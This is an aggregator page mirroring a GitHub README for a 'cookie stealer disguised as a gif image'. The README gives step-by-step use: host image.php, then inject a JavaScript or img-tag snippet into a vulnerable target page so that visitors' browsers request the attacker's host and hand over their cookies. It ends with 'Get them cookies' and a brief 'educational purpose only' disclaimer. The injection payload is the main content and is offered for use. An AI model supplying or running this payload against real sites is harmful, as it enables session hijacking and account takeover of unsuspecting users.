57

GitHub - victorqribeiro/cookieStealer: A cookie stealer disguised as a gif image

 5 years ago
source link: https://github.com/victorqribeiro/cookieStealer
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

README.md

Cookie Stealer

A cookie stealer disguised as a gif image.

Hot to use

Host the image.php file wherever you want.

Inject the code on the target

let img = new Image();
img.src = "http://yoursite.com/image.php";
document.body.appendChild(img);

or in plain html

<img src="http://yoursite.com/image.php">

Get them cookies.

Disclaimer

I'm not responsible for your actions. The code provided here is for educational purpose only. If you find a web site with code injection vulnerability, inform them.

I wrote this script some time ago, after watching this video:

Send cookies with image request


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK